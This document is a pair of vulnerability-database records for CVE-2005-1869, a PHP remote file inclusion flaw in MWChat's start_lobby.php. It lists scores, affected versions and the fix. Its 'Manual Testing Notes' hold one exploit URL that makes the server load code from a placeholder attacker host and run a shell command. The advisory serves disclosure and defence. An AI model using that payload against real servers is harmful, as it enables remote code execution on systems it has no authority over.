{"modified": "2008-09-05T16:50:17", "id": "CVE-2005-1869", "edition": 1, "objectVersion": "1.2", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1869", "cvelist": ["CVE-2005-1869"], "references": ["http://www.securitytracker.com/alerts/2005/Jun/1014090.html", "http://www.defacers.com.mx/advisories/4.txt", "http://www.appindex.net"], "bulletinFamily": "NVD", "cpe": ["cpe:/a:appindex:mwchat:6.7"], "title": "CVE-2005-1869", "published": "2005-06-07T00:00:00", "viewCount": 1, "type": "cve", "lastseen": "2016-09-03T05:31:03", "description": "PHP remote file inclusion vulnerability in start_lobby.php in MWChat 6.x allows remote attackers to execute arbitrary PHP code via the CONFIG[MWCHAT_Libs] parameter.", "hash": "2e20bc555922305fc2f697dba13cf1f9f07965cea14d3ba9fe77725b31b12e22", "reporter": "NVD", "scanner": [], "assessment": {"system": "", "name": "", "href": ""}, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2016-09-03T05:31:03"}, "vulnersScore": 7.5}}

{"osvdb": [{"lastseen": "2017-04-28T13:20:13", "references": [], "edition": 1, "description": "## Vulnerability Description\nMWChat contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to start_lobby.php not properly sanitizing user input supplied to the CONFIG[MWCHAT_Libs] variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nIt has been reported that the vendor's distribution file ships with .htaccess files which protect several directories. This flaw is only exploitable if the .htaccess file has been removed.\n## Solution Description\nUpgrade to version 6.8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nMWChat contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to start_lobby.php not properly sanitizing user input supplied to the CONFIG[MWCHAT_Libs] variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://[attacker]/cmd.txt?&cmd=uname -a\n## References:\nVendor URL: http://www.appindex.net/products/detail/?product=mwchat\nVendor URL: http://www.appindex.net\nSecurity Tracker: 1014090\n[Secunia Advisory ID:15596](https://secuniaresearch.flexerasoftware.com/advisories/15596/)\nOther Advisory URL: http://www.defacers.com.mx/advisories/4.txt\nISS X-Force ID: 20865\n[CVE-2005-1869](https://vulners.com/cve/CVE-2005-1869)\n", "reporter": "Status-x(phr4xz@gmail.com)", "published": "2005-06-01T08:12:26", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "MWChat start_lobby.php Remote File Inclusion", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [{"name": "MWChat", "version": "6.4", "operator": "eq"}, {"name": "MWChat", "version": "6.6", "operator": "eq"}, {"name": "MWChat", "version": "6.1", "operator": "eq"}, {"name": "MWChat", "version": "6.5", "operator": "eq"}, {"name": "MWChat", "version": "6.0", "operator": "eq"}, {"name": "MWChat", "version": "6.7", "operator": "eq"}, {"name": "MWChat", "version": "6.3", "operator": "eq"}, {"name": "MWChat", "version": "6.2", "operator": "eq"}], "cvelist": ["CVE-2005-1869"], "modified": "2005-06-01T08:12:26", "href": "https://vulners.com/osvdb/OSVDB:17087", "id": "OSVDB:17087", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}